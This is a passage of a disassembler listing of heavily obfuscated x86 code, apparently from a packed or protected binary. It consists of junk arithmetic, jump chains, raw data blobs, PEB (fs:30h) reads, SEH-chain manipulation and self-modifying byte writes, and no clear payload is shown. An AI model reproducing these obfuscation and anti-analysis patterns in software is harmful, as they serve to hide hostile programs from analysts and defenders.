		dd 0CD0C3DF7h, 13C1C159h, 0EA64E181h, 0C1810C15h, 0B9CF118Eh
		dd 8AE6E181h, 0C1E99E85h
		db 3 dup(0FFh)
; ---------------------------------------------------------------------------

loc_48ACD3:				; CODE XREF: sub_48E5CF:loc_48CA4Aj
		mov	byte ptr [edx],	87h
		xchg	ebp, [esp-8+arg_4]
		mov	edx, ebp
		pop	ebp
		push	62BBC855h
		pop	eax
		add	eax, 1A80BE8h
		jmp	loc_48CBD2
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

locret_48ACEF:				; CODE XREF: sub_48A195:loc_48B966j
		retn
; ---------------------------------------------------------------------------

loc_48ACF0:				; DATA XREF: sub_48A195+509o
		mov	ebp, esp
		jo	loc_48CF3D
		push	ecx
		mov	[ebp-4], eax
		push	ecx
		mov	ecx, edi
		xchg	ecx, [esp+14h+var_14]
		jmp	loc_48B8ED
; ---------------------------------------------------------------------------
		align 4
		db  87h	; 
		db  34h	; 4
		db  24h	; $
		db  5Eh	; ^
		db    8
		db 0C0h	; 
		db  0Fh
		db  84h	; 
		db  35h	; 5
		db  33h	; 3
		db    0
		db    0
		db  68h	; h
		db 0F6h	; 
		db  24h	; $
		db 0C7h	; 
		db  5Fh	; _
		db  87h	; 
		db  14h
		db  24h	; $
		db 0E9h	; 
		db 0F7h	; 
		db  13h
		db    0
		db    0
		db 2 dup(0), 0C1h
		dd 0E08106C0h, 793CAFD8h, 4ACCC081h, 82E8C719h,	37h, 0BEE9C300h
		dd 0F00003Fh, 216B8Ch, 1EC9C100h, 799CF81h, 5BE929D4h
		dd 8B000021h, 0DFCE800h
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48AD5A:				; CODE XREF: sub_48A195:loc_48A9B1j
		rol	eax, 5
		add	eax, 22F8A5A2h
		call	sub_48E4E6
		rol	eax, 14h
		add	eax, 2436C278h
		rol	eax, 1
		add	eax, 6A172595h
		mov	eax, [eax]
		push	489C73h
		jmp	loc_48DDF3
; ---------------------------------------------------------------------------
		db 2 dup(0), 81h
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		db 70h,	9Dh, 69h
; ---------------------------------------------------------------------------
		pop	edx
		or	ebx, 0D5419D47h
		xor	ebx, 77E97141h
		add	ebx, 5FC2266Ch
		jmp	loc_48B436
; ---------------------------------------------------------------------------
		dd 8B530000h, 241C87D9h, 45706856h, 85683B4Fh, 0E90048CBh
					; CODE XREF: sub_48A195:loc_48CED9j
		dd 2A8h, 0A9ED6800h, 0A4E90048h, 25h, 820EC281h, 0C2C1A0E7h
		dd 0FEEA810Fh, 8157D39Ah, 1B3F54F2h, 3D37E968h,	0
; ---------------------------------------------------------------------------

loc_48ADE4:				; CODE XREF: sub_48A195:loc_48BAB0j
		push	ebx
		push	2135FF37h
		pop	ebx
		and	ebx, 1F307D94h
		add	ebx, 0FF186A4Bh
		jmp	loc_4899C3
; ---------------------------------------------------------------------------
		mov	byte ptr [edi],	3
		xchg	edx, [esp+0Ch+var_C]
		mov	edi, edx
		pop	edx
		mov	edx, [edx]
		push	offset word_48D97E
		jmp	nullsub_565
; ---------------------------------------------------------------------------
		db 2 dup(0), 68h
		dd offset loc_48D170
; ---------------------------------------------------------------------------
		jmp	nullsub_566
; ---------------------------------------------------------------------------

loc_48AE1D:				; CODE XREF: ss.cste0:0048CC56j
		mov	byte ptr [eax],	3
		xchg	edx, [esp+0Ch+var_C]
		mov	eax, edx
		pop	edx
		push	dword ptr [ebp-4]
		jmp	loc_48B3FD
; ---------------------------------------------------------------------------
		dw 0C100h
		db 0C5h	; 
		db    2
		db 0E9h	; 
		db  47h	; G
		db  23h	; #
		db    0
		db    0
		db 81h
		dd 5328F6E1h, 98BE5648h, 0E90048C5h, 0FFFFF936h, 0E9CF2300h
		dd 22D5h, 0C04C281h, 0E89D5CA6h, 0D1h
		db 0
; ---------------------------------------------------------------------------

loc_48AE5D:				; CODE XREF: ss.cste0:0048D87Fj
		jmp	loc_489981
; ---------------------------------------------------------------------------
		dw 6800h
		dd offset dword_48BCEC
; ---------------------------------------------------------------------------
		jmp	nullsub_568
; ---------------------------------------------------------------------------
		db 2 dup(0), 0C6h
		dd 685A8B02h, 48EB8Eh, 1820E9h
		db 0
; ---------------------------------------------------------------------------

loc_48AE7D:				; CODE XREF: ss.cste0:0048A152j
					; ss.cste0:loc_48CE7Cj
		and	eax, 0FE8C7AB3h
		or	eax, 0B4EA17D3h
		test	eax, 40000000h
		jmp	loc_48A9B1
; ---------------------------------------------------------------------------
		dd 3220C281h, 24E87D88h, 0FFFFEDh, 0FFE907E9h
		db 0FFh
; ---------------------------------------------------------------------------

loc_48AEA5:				; CODE XREF: sub_48A195+7E1j
		jmp	locret_48B081
; ---------------------------------------------------------------------------
		dw 0C300h		; CODE XREF: ss.cste0:0048ECEAj
		db 0
; ---------------------------------------------------------------------------

loc_48AEAD:				; CODE XREF: sub_48E325:loc_48E330j
		mov	byte ptr [edi],	8Dh
		pop	edi
		rol	ecx, 0Bh
		xor	ecx, 627E3419h
		add	ecx, 0E4FC4268h
		xor	ecx, 7B98F216h
		add	ecx, 392A72F6h
		jmp	loc_48BAB0
; ---------------------------------------------------------------------------
		db 2 dup(0), 0C6h	; CODE XREF: sub_48A195:loc_48C32Dj
		dd 535E8B06h, 0C528A368h, 0A4E95BF7h, 0C6FFFFFEh, 2C870F00h
		dd 5DC58B24h, 48AD5368h, 3249E900h, 0C1000000h,	0C23103C2h
		dd 57850F5Ch, 87FFFFE9h, 0EAE9242Ch, 0FFFFF2h, 0E9007D87h
		dd 337h
		db 0
; ---------------------------------------------------------------------------

loc_48AF15:				; DATA XREF: sub_48A195:loc_48AC5Co
		push	54024872h
		pop	ecx
		sub	ecx, 72A80F85h
		add	ecx, 1EEEA23Ah
		jmp	loc_48DB1F
; ---------------------------------------------------------------------------
		dd 243C8700h, 2414875Fh, 0C2C66857h, 0B4E90048h, 2Dh, 0F810F00h
		dd 0F7000015h
		db 0D2h
; ---------------------------------------------------------------------------

loc_48AF49:				; CODE XREF: sub_48A195:loc_48B2ACj
		xor	edx, 0D9D221C1h
		call	near ptr dword_489A0C+1

loc_48AF54:				; DATA XREF: ss.cste0:0048D54Ao
		xchg	esi, [esp+10h+var_10]
		jmp	loc_48C099
; ---------------------------------------------------------------------------
		mov	eax, large fs:30h
		add	eax, 963EDAC7h
		add	eax, 69C125A1h
		mov	eax, [eax]
		push	offset dword_48E8A8
		jmp	loc_48CF00
; ---------------------------------------------------------------------------
		add	esi, 131B8958h
		mov	esi, [esi]
		xchg	esi, [esp+14h+var_14]

loc_48AF86:				; DATA XREF: sub_48A195+15B4o
		ficom	ds:dword_45D0C0
		push	edx
		push	19B26DB6h
		pop	edx
		jmp	loc_48DA78
; ---------------------------------------------------------------------------

loc_48AF98:				; CODE XREF: sub_48A195:loc_48CFAEj
		jge	loc_48B4DD

loc_48AF9E:				; CODE XREF: sub_48A195+3D96j
		jmp	loc_48E998
; ---------------------------------------------------------------------------
		align 4
		not	edx
		jmp	loc_48B48A
; ---------------------------------------------------------------------------
		align 4
		add	edx, 74730C18h
		or	edx, 0B1E7D913h
		sub	edx, 0DB367E3Bh
		push	48AB5Fh
		jmp	nullsub_569
; ---------------------------------------------------------------------------
		dd 685E0000h, 48C5D1h, 1856E9h,	0C30000h ; CODE	XREF: sub_48A195:loc_48CBEDj
; ---------------------------------------------------------------------------

loc_48AFD8:				; CODE XREF: sub_48A195+20F8j
		jmp	loc_48A9FF
; ---------------------------------------------------------------------------
		db 2 dup(0), 64h
		dd 58Fh, 0C4240000h, 52B804h, 0BE80000h, 0E9000000h, 20E8h
		dd 2F26E900h
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48AFFE:				; CODE XREF: sub_48A195+AADj
					; sub_48A195+192Dj ...
		jnz	loc_48CB4C
		jmp	loc_48A71B
; ---------------------------------------------------------------------------
		align 2
		not	ecx
		jmp	loc_48E973
; ---------------------------------------------------------------------------
		pop	ebp
		jmp	loc_48CED9
; ---------------------------------------------------------------------------
		align 4
		dd 0C4EF815Fh, 81A89556h, 404B36F7h, 221E812h, 0E9000000h
		dd 467h, 95E90000h, 0E9000004h,	1128h, 79680000h, 8711D933h
		dd 0C18B240Ch, 0D0B95159h, 0E9004898h, 0FFFFF43Eh, 0E9D73B00h
		dd 1C41h, 76E8C300h, 16h, 0FFEA46E9h
		db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------

loc_48B06B:				; CODE XREF: sub_48A17A+Aj
		jmp	loc_48C79C
; ---------------------------------------------------------------------------
dword_48B070	dd 87F38B56h, 55682434h, 5BF3FC3Bh, 0FFF9B4E9h ; DATA XREF: sub_48E8DE+7o
		db 0FFh
; ---------------------------------------------------------------------------

locret_48B081:				; CODE XREF: sub_48A195:loc_48AEA5j
		retn
; ---------------------------------------------------------------------------
		align 4
		jmp	locret_48B8A7
; ---------------------------------------------------------------------------
		db 0Fh,	8Ah, 0FBh
		dd 0E9000011h, 3274h, 0C0810000h, 0BCDAD1EFh, 1487008Bh
		dd 5ACA8B24h, 294AE9h, 81000000h, 846200E2h, 14C2C1FCh
		dd 178AF281h, 0CA3B496Fh, 0EC77E95Ah, 0F00FFFFh, 1B6E8Bh
		dd 1465E900h, 0F000000h, 0C9184h, 0C7810000h, 0C81971F6h
		dd 0C78E9h, 860F0000h, 39FBh
; ---------------------------------------------------------------------------

loc_48B0E8:				; CODE XREF: sub_48A195+2Ap
		xchg	eax, [esp-0Ch+arg_8]
		xchg	ebx, [esp-0Ch+arg_8]
		mov	eax, ebx
		jmp	near ptr dword_489788+11Eh
; ---------------------------------------------------------------------------
		align 2
		jz	loc_48E796
		push	edx
		push	4D184FDFh
		pop	edx
		sub	edx, 9950E2C9h
		jmp	loc_48D250
; ---------------------------------------------------------------------------
		align 10h

loc_48B110:				; CODE XREF: ss.cste0:loc_48C8B0j
		xor	eax, eax
		call	sub_48C4EC
; ---------------------------------------------------------------------------
		db 0
		db 0
; ---------------------------------------------------------------------------

loc_48B119:				; CODE XREF: ss.cste0:0048CF93j
		jmp	loc_48AC3F
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48B11F:				; CODE XREF: sub_48A195+2ADj
		jmp	locret_48B46E
; ---------------------------------------------------------------------------
		dd 0FEE90000h, 19h, 0C300h, 1DC5E9h, 0FA9DE900h, 0C300FFFFh
		dd 142E900h
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48B142:				; CODE XREF: sub_48A195:loc_48EBCAj
		xor	esi, 0CC359F5Dh
		add	esi, 8E5A31B7h
		xor	esi, 0A1F49EA4h
		xchg	esi, [esp+4+var_4]
		call	sub_48E94F
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

locret_48B15D:				; CODE XREF: ss.cste0:loc_48D8BFj
		retn
; ---------------------------------------------------------------------------
		align 10h
		dd 8C840F5Eh, 0E900002Dh, 0FFFFF693h, 0C2030000h, 11F2E9h
		db 2 dup(0)
; ---------------------------------------------------------------------------

locret_48B176:				; CODE XREF: sub_48A195+ACCj
		retn
; ---------------------------------------------------------------------------
		align 4

loc_48B178:				; CODE XREF: sub_48A195+1365j
		jmp	nullsub_551
; ---------------------------------------------------------------------------
		align 2

locret_48B17E:				; CODE XREF: sub_489DC5:loc_489A07j
		retn
; ---------------------------------------------------------------------------
		jmp	loc_48C410
; ---------------------------------------------------------------------------
		dd 0BE90000h, 50FFFFFFh, 62E9D6F7h
		db 4, 2	dup(0)
; ---------------------------------------------------------------------------

loc_48B193:				; CODE XREF: sub_48D04D-BE2p
		xchg	ecx, [esp+4+var_4]
		pop	ecx
		push	offset loc_48A24D
		jmp	loc_48D818
; ---------------------------------------------------------------------------
		align 2
		sub	edx, esi
		jmp	loc_48DE35
; ---------------------------------------------------------------------------
		push	offset loc_48CE6E
		jmp	loc_48BED9
; ---------------------------------------------------------------------------
		db 99h
		dd 6635E681h, 0F081EAC9h, 7840FDBDh, 489B2168h,	0F94FE900h
		dd 8100FFFFh, 4E2E4BEAh, 88820F6Eh, 0FFFFECh, 2119E900h
		dd 0F1E90000h, 7, 0FC61300h, 38CD8Fh, 0E9EA1300h, 0FFFFEC69h
		dd 48B3F068h, 11C7E900h, 0
; ---------------------------------------------------------------------------

loc_48B200:				; CODE XREF: sub_48A195+3E7Ap
		xchg	edx, [esp+8+var_8]
		pop	edx
		mov	eax, [eax+0Ch]
		add	eax, 0E0CAD074h
		add	eax, 1F352F98h
		push	offset byte_48EB2C
		jmp	loc_48B39A
; ---------------------------------------------------------------------------

loc_48B21D:				; CODE XREF: sub_48A195+647j
		sub	ebx, 37940EFDh
		xor	ebx, 1E914BADh
		and	ebx, 0D34B1A6Fh
		push	48A584h
		jmp	near ptr dword_489CE8+3
; ---------------------------------------------------------------------------
		align 2
		dw 0B8Bh
		dd 0FFEDA4E9h, 0FA3300FFh, 1102E9h, 68000000h, 48B64Eh
		dd 0FFEEDBE9h, 810000FFh, 40FD49D1h, 0EF50E990h, 0FC68FFFFh
		dd 0E90048ADh, 0BBh, 5F243C87h,	4BC55F68h, 0C0C1583Ah
		dd 0C0F717h, 0E9004000h, 0FFFFF981h, 2E81880Fh,	0E9990000h
		dd 2E71h, 0FC00900h, 0FFF2AA84h, 0F91EE8FFh
		db 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_48B29E:				; CODE XREF: sub_48A195+1235j
		jmp	loc_48CC5B
; ---------------------------------------------------------------------------
		cmp	edi, ebx
		jmp	loc_48C7C7
; ---------------------------------------------------------------------------
		align 4

loc_48B2AC:				; CODE XREF: sub_48A195+927j
		jge	loc_48AF49
		jmp	nullsub_557
; ---------------------------------------------------------------------------
		align 4
		dd 0EDC1E987h, 268A0F19h, 8500000Ch, 0FC77E9DDh, 0FFFFh
; ---------------------------------------------------------------------------

locret_48B2CC:				; CODE XREF: sub_48E8DE+Cj
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0), 87h
; ---------------------------------------------------------------------------
		sbb	al, 24h
		pop	ebx
		push	offset word_48CA1A
		jmp	loc_48DC74
; ---------------------------------------------------------------------------

locret_48B2DD:				; CODE XREF: sub_48A195+21B1j
		retn
; ---------------------------------------------------------------------------
		align 10h
		dd 0FFEA0DE9h
		db 0FFh
; ---------------------------------------------------------------------------

loc_48B2E5:				; CODE XREF: sub_48A195+AC0j
		jmp	nullsub_532
; ---------------------------------------------------------------------------
		dw 0C300h
		dd 0F3810000h, 2195CF7Eh, 1EC9E9h
		db 0
; ---------------------------------------------------------------------------

loc_48B2F9:				; CODE XREF: sub_48A195+3B17j
		push	offset loc_48D241
		jmp	nullsub_546
; ---------------------------------------------------------------------------
		align 4
		jge	loc_48B8F2
		popf
		shr	eax, 1Dh
		jmp	loc_48DCBB
; ---------------------------------------------------------------------------
		shl	ecx, 5
		jmp	sub_48C3A4
; ---------------------------------------------------------------------------
		align 4
dword_48B31C	dd 48C9ED68h, 0FD0CE900h, 0C300FFFFh, 3D680000h, 0E90048EAh
					; DATA XREF: ss.cste0:0048DDD2o
		dd 22F3h, 68243C87h, 48D7AEh, 142BE9h, 87000000h, 8159240Ch
		dd 0C8BD69C6h, 68F50324h, 48A433h, 2734E9h, 0C1000000h
		dd 65E909E8h, 36h, 196F6800h, 840FD6DBh, 0EA3h,	38FBE9h
		dd 0F000000h, 293E85h, 0E9F78500h, 0FFFFFF80h, 6800C300h
		dd 0AFC14FC8h, 43E3815Bh, 0E9854662h, 245Fh
		db 0, 0C3h
; ---------------------------------------------------------------------------

loc_48B39A:				; CODE XREF: sub_48A195+1083j
		jmp	nullsub_571
; ---------------------------------------------------------------------------
		align 10h
		jno	loc_48B42F
		mov	ecx, 82380459h
		xchg	ecx, [ebp+0]
		xchg	esi, [esp+8+var_8]
		mov	ecx, esi
		jmp	loc_48CBED
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48B3B9:				; CODE XREF: sub_48A195:loc_48D564j
		add	esi, 0DA4DB434h
		xor	esi, 6EA29FAFh
		popf
		add	eax, esi
		pop	esi
		push	eax
		jmp	loc_48B29E
; ---------------------------------------------------------------------------
		db 99h
dword_48B3D0	dd 0FFE4C0E9h, 0C30000FFh, 100002C7h ; DATA XREF: ss.cste0:0048CC68o
		db 2 dup(0), 0C3h
; ---------------------------------------------------------------------------

locret_48B3DF:				; CODE XREF: sub_48A195+33F0j
					; DATA XREF: sub_48A195:loc_48C164o
		retn
; ---------------------------------------------------------------------------
		dd 185188h, 21E95100h, 16h, 0C300h, 89242C87h, 0B5E8FC45h
		dd 26h
		db 0
; ---------------------------------------------------------------------------

loc_48B3FD:				; CODE XREF: sub_48A195+C94j
		call	ds:dword_45D0C0	; ExitProcess
		push	offset loc_48CD05
		jmp	loc_48C093
; ---------------------------------------------------------------------------
		db 2 dup(0), 81h
		dd 0FE6A40C8h, 0B6E8814Ah, 81B19DDFh, 0A35F77E0h, 21C08168h
		db 0B1h, 22h, 0D8h
byte_48B427	db 9			; DATA XREF: sub_48A195:loc_48E833o
		dd 6C840FC0h
		db 0E4h, 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_48B42F:				; CODE XREF: sub_48A195+120Bj
		jmp	loc_48BD4D
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48B436:				; CODE XREF: sub_48A195+C0Aj
		push	offset sub_48D47C
		jmp	loc_48D56A
; ---------------------------------------------------------------------------
		dd 0C1EB1B00h, 0C28106C2h, 8B35958Ah, 862E8h, 43E90000h
		dd 0E900000Ah, 0F8Dh
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48B45E:				; CODE XREF: sub_48A195+A61j
		jmp	loc_48B797
; ---------------------------------------------------------------------------
		jno	loc_48BA30
		jmp	sub_48C2E9
; ---------------------------------------------------------------------------

locret_48B46E:				; CODE XREF: sub_48A195:loc_48B11Fj
		retn
; ---------------------------------------------------------------------------
		align 10h
		dd 32BBE900h
		db 3 dup(0)
; ---------------------------------------------------------------------------

loc_48B477:				; CODE XREF: sub_48A195:loc_48DDC7j
		jz	loc_48E87A

loc_48B47D:				; CODE XREF: ss.cste0:0048DAAAj
		jmp	loc_48C57A
; ---------------------------------------------------------------------------
		not	eax
		push	ebp
		jmp	loc_48E878
; ---------------------------------------------------------------------------

loc_48B48A:				; CODE XREF: sub_48A195+E11j
		shl	ebp, 1Eh
		sub	edx, ebx
		test	ebx, eax
		jmp	loc_48B4D2
; ---------------------------------------------------------------------------
		dw 0C300h
		dd 0B9510000h, 48C9F9h,	292DE9h
		db 3 dup(0)
byte_48B4A7	db 68h			; DATA XREF: sub_48EAB0o
		dd offset sub_48D700
		dd 0FFEF2AE9h, 0E99D00FFh, 35EBh, 78E850Fh
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48B4BE:				; CODE XREF: sub_48C8CE+Bj
		jmp	loc_48BDA5
; ---------------------------------------------------------------------------
		align 4
		dd 0E3E95000h, 0FFFFF6h, 0F35AE9C3h
		db 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_48B4D2:				; CODE XREF: sub_48A195+12FCj
		jnb	loc_48DAF1
		mov	ebx, 0E6093279h

loc_48B4DD:				; CODE XREF: sub_48A195:loc_48AF98j
		add	eax, 0AC3442EDh
		or	eax, 0CDA6EE63h
		and	eax, 0C01D3835h
		xor	eax, 0C00D3843h
		push	offset dword_48B754
		jmp	loc_48B178
; ---------------------------------------------------------------------------
		align 10h
		push	70D95A6h
		xchg	ecx, [esp+28h+var_28]
		mov	eax, ecx
		pop	ecx
		and	eax, 0B3C85490h
		jmp	loc_48D5E5
; ---------------------------------------------------------------------------
		jg	loc_48D244
		rol	eax, 4
		and	ecx, ebx

loc_48B521:				; CODE XREF: sub_48A195:loc_489BA6j
		rol	edi, 15h
		or	edi, 0EF3D3E6h
		add	edi, 0C054C8C3h
		jmp	loc_48A5D9
; ---------------------------------------------------------------------------
		align 2
		xchg	ecx, [esp-8+arg_4]
		mov	edx, ecx
		pop	ecx
		and	edx, 7F41ED70h
		sub	edx, 0AA3BB813h
		test	edx, 40000000h
		jmp	loc_48C915
; ---------------------------------------------------------------------------

loc_48B553:				; CODE XREF: ss.cste0:0048E45Aj
		mov	byte ptr [ebx],	87h
		xchg	ebp, [esp-0Ch+arg_8]
		mov	ebx, ebp
		pop	ebp
		add	esi, 1360B954h
		jmp	loc_48DCB5
; ---------------------------------------------------------------------------
		ror	eax, 1Ah
		push	0FECE2BDCh
		jmp	loc_48D02F
; ---------------------------------------------------------------------------
		dd 0F6810000h, 0CE44F694h, 51D5C681h, 0BE68D9D0h, 0E900489Fh
					; CODE XREF: ss.cste0:0048E7B9j
		dd 1995h, 68240C87h, 0C08CDA1Dh, 28EA815Ah, 0E997A0DCh
		dd 0B90h, 17890000h, 0DA68D613h, 0E900489Ah, 0FFFFEA92h
		db 0
; ---------------------------------------------------------------------------

loc_48B5B1:				; CODE XREF: sub_48A195:loc_48B9FDj
		call	sub_48EC70
; ---------------------------------------------------------------------------
		dw 0
; ---------------------------------------------------------------------------
		xchg	ebp, [esp-0Ch+arg_8]
		mov	eax, ebp
		pop	ebp
		jmp	loc_48BECD
; ---------------------------------------------------------------------------
		align 4

loc_48B5C4:				; CODE XREF: sub_48E3F4+14j
		push	esi
		mov	esi, ecx
		xchg	esi, [esp-0Ch+arg_8]
		mov	ecx, offset byte_48B947
		jmp	near ptr word_48A836+1
; ---------------------------------------------------------------------------
		push	28C71325h
		xchg	edi, [esp-8+arg_4]
		mov	edx, edi
		pop	edi
		and	edx, 964FB486h
		jmp	loc_48DBA8
; ---------------------------------------------------------------------------
		dw 0D0F7h
		dd 59240C87h, 2811E8h, 0CF819D00h, 0F1CEFCC6h, 59B7E781h
		dd 0C781FE5Fh, 5EA5D5Bh
dword_48B608	dd 0E9243C48h, 0FFFFE1B0h, 0A3E80000h, 6800002Dh, 709CFEC2h
					; DATA XREF: sub_48CAE5+5o
		dd 0C3EF815Fh, 818F8C34h, 10C98FF7h, 0C7859DE1h, 142DE8h
		dd 0E9000000h, 145Dh, 9008B00h,	6B850FC0h, 0E8000034h
		dd 345Bh
; ---------------------------------------------------------------------------

loc_48B648:				; CODE XREF: sub_48A195-4B5j
		jmp	loc_48BDEF
; ---------------------------------------------------------------------------
		align 2
		dw 3487h
		dd 0FD035E24h, 0EF67E956h, 0F88BFFFFh, 880BDB81h, 9AE9D12Dh
		dd 0C3000013h, 354FE9h,	5AF28B00h, 0ACDA6E68h, 0EDE9581Fh
		dd 0FFFFF6h, 0FFF560E8h
		db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------

loc_48B683:				; DATA XREF: sub_48A195:loc_48EA27o
		pop	large dword ptr	fs:0
		push	offset loc_48E83F
		jmp	loc_48D630
; ---------------------------------------------------------------------------
		dd 0FFE891E8h
		db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------

loc_48B69B:				; CODE XREF: sub_48A195+2E10j
		jmp	loc_48A8CB
; ---------------------------------------------------------------------------
		dd 1C870000h, 75685B24h, 5EEF45C4h, 0E908C6C1h,	0FFFFFC2Ch
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48B6B6:				; CODE XREF: sub_48D91D+26j
		cmp	ecx, 0E22138DAh
		jmp	loc_48DACB
; ---------------------------------------------------------------------------
		push	offset dword_48E86C
		jmp	nullsub_574
; ---------------------------------------------------------------------------
		push	offset sub_48CF58
		jmp	nullsub_575
; ---------------------------------------------------------------------------

loc_48B6D5:				; DATA XREF: sub_48A195:loc_48D68Do
		add	eax, 0B7848CBEh
		call	sub_48E595
		add	cl, ch
		pop	ebx
		xor	eax, 0

loc_48B6E8:				; CODE XREF: sub_48A195+697p
		xchg	edi, [esp+10h+var_10]
		xchg	esi, [esp+10h+var_10]
		mov	edi, esi
		pop	esi
		mov	byte ptr [eax],	8Ah
		pop	eax
		jmp	loc_48E142
; ---------------------------------------------------------------------------
		dw 8100h		; CODE XREF: ss.cste0:loc_48C545j
		dd 0C9CB95E6h, 9ECE81F0h, 81FA554Eh, 6AD06AC6h,	0E9368B05h
		dd 1C5Eh
		db 0
; ---------------------------------------------------------------------------

loc_48B715:				; CODE XREF: sub_48A195:loc_48A71Bj
		push	edx
		mov	edx, offset loc_489CA9
		jmp	loc_48D968
; ---------------------------------------------------------------------------

loc_48B720:				; CODE XREF: sub_48BEE6:loc_48DDCDj
		and	esi, 0C2AF3E0h
		sub	esi, 0F641F9A6h
		and	esi, 0D5C6D2A8h
		sub	esi, 0D449063Fh
		add	esi, 9A4B639Ch
		cmp	edx, esi
		pop	esi
		jmp	loc_48CFE4
; ---------------------------------------------------------------------------
		add	edi, ebp
		push	ecx
		mov	ecx, offset loc_48AF86
		jmp	loc_48EAD9
; ---------------------------------------------------------------------------
		align 4
dword_48B754	dd 0E71BE852h, 6800FFFFh, 877235E9h, 0FFE5E8E9h, 0A47A68FFh
					; DATA XREF: sub_48A195+1360o
		dd 94E90048h, 3FFFFE9h,	0F1B7E8C6h, 108BFFFFh, 840FD209h
		dd 0FFFFFE44h, 2277E956h, 0
; ---------------------------------------------------------------------------
		rol	edi, 11h
		mov	esi, 4CAA5568h
		jmp	sub_48E3C8
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48B797:				; CODE XREF: sub_48A195:loc_48B45Ej
		mov	ecx, esi
		pop	esi
		sub	ecx, 0EBBB10F7h
		test	ecx, 800000h
		jmp	near ptr dword_48AA54+32h
; ---------------------------------------------------------------------------
		align 4
dword_48B7AC	dd 6AC3689Ch, 815E4DE6h, 0D6DABCC6h, 80E68139h,	0C1F7D536h
					; DATA XREF: sub_48E2A9+5o
		dd 0CE8104C6h, 4C75F74Fh, 2530E8h, 0C3000000h, 0E99D00C3h
		dd 0FFFFE321h
; ---------------------------------------------------------------------------

locret_48B7D8:				; CODE XREF: ss.cste0:0048A00Cj
		retn
; ---------------------------------------------------------------------------
		mov	byte ptr [eax],	85h
		xchg	edx, [esp-8+arg_4]
		mov	eax, edx
		pop	edx
		jmp	loc_48C87E
; ---------------------------------------------------------------------------

locret_48B7E7:				; CODE XREF: ss.cste0:0048E777j
		retn
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48B7E9:				; CODE XREF: sub_48DE06-1C1Fj
		jmp	loc_48DE9A
; ---------------------------------------------------------------------------
		align 10h

loc_48B7F0:				; CODE XREF: ss.cste0:0048E77Cj
					; DATA XREF: ss.cste0:loc_48E772o
		jmp	loc_48D671
; ---------------------------------------------------------------------------
		db 87h,	34h, 24h
		dd 1C50E8h, 0E9000000h,	0FFFFF7FAh, 0A55ACB81h,	8158368Ah
		dd 73855EE3h, 0D1FE89Ch, 0C30000h, 0FFF1CEE9h, 4B8D0FFFh
		dd 8BFFFFE1h, 0F530E9FBh
		db 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_48B82A:				; CODE XREF: sub_48A195:loc_48A326j
		mov	byte ptr [edx],	87h
		xchg	esi, [esp-4+arg_0]
		mov	edx, esi
		pop	esi
		call	sub_48D9CE
; ---------------------------------------------------------------------------
		dd 5E90000h
		db 0E4h, 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_48B83F:				; CODE XREF: sub_48E016-655j
		push	offset word_48C042
		jmp	loc_48A08E
; ---------------------------------------------------------------------------

locret_48B849:				; CODE XREF: sub_48A195:loc_48E691j
		retn
; ---------------------------------------------------------------------------
		align 4

loc_48B84C:				; CODE XREF: ss.cste0:loc_48E3EEj
		jmp	near ptr dword_489A68+55h
; ---------------------------------------------------------------------------
		db    0
		db    0
		db  87h	; 
		db  14h
		db  24h	; $
		db  5Ah	; Z
		db  81h	; 
		db 0C7h	; 
		db  81h	; 
		db 0A6h	; 
		db  7Ch	; |
		db  23h	; #
		db 0E8h	; 
		db  3Bh	; ;
		db 0EAh	; 
		db 0FFh
		db 0FFh
		db    0
		db    0
; ---------------------------------------------------------------------------

loc_48B864:				; CODE XREF: sub_48A195+2E89j
		jmp	near ptr dword_489F28+2Ch
; ---------------------------------------------------------------------------
		db 2 dup(0), 81h
; ---------------------------------------------------------------------------
		enter	18C0h, 0D6h
		push	edx
		sub	eax, 0E642D8E9h
		push	offset loc_48C515
		jmp	nullsub_577
; ---------------------------------------------------------------------------
		db 2 dup(0), 81h	; CODE XREF: sub_48E7EE+Bj
		dd 21754AEBh, 97E381B9h, 819116A6h, 0D03256EBh,	69CB8161h
		dd 81410227h, 18E3CEC3h, 2936E911h
		db 3 dup(0)
; ---------------------------------------------------------------------------

locret_48B8A7:				; CODE XREF: sub_48A195+EEFj
		retn
; ---------------------------------------------------------------------------
		dd 10680000h, 5E884655h, 9A4BC681h, 0F681EAE2h,	7328EF7Bh
		dd 48B76F68h, 0EC8EE900h
		db 2 dup(0FFh),	0
; ---------------------------------------------------------------------------

loc_48B8C7:				; CODE XREF: sub_48A195:loc_48EAD9j
		push	offset loc_48DFF4
		jmp	nullsub_576
; ---------------------------------------------------------------------------
		db 89h,	13h, 0E9h
		dd 0FFFFE07Dh
; ---------------------------------------------------------------------------

locret_48B8D8:				; CODE XREF: sub_48CF06:loc_48DD3Dj
		retn
; ---------------------------------------------------------------------------
		align 2
		dw 0F381h
		dd 0E435F64h, 0D93DFB81h, 6CE9C769h, 0FFFFFBh
		db 0
; ---------------------------------------------------------------------------

loc_48B8ED:				; CODE XREF: sub_48A195+B6Dj
		mov	edi, offset loc_48BBC8

loc_48B8F2:				; CODE XREF: sub_48A195+116Fj
		jmp	loc_48D8A4
; ---------------------------------------------------------------------------

loc_48B8F7:				; CODE XREF: sub_48A195+18D3j
		mov	esi, offset loc_48DA43
		jmp	loc_48E1E1
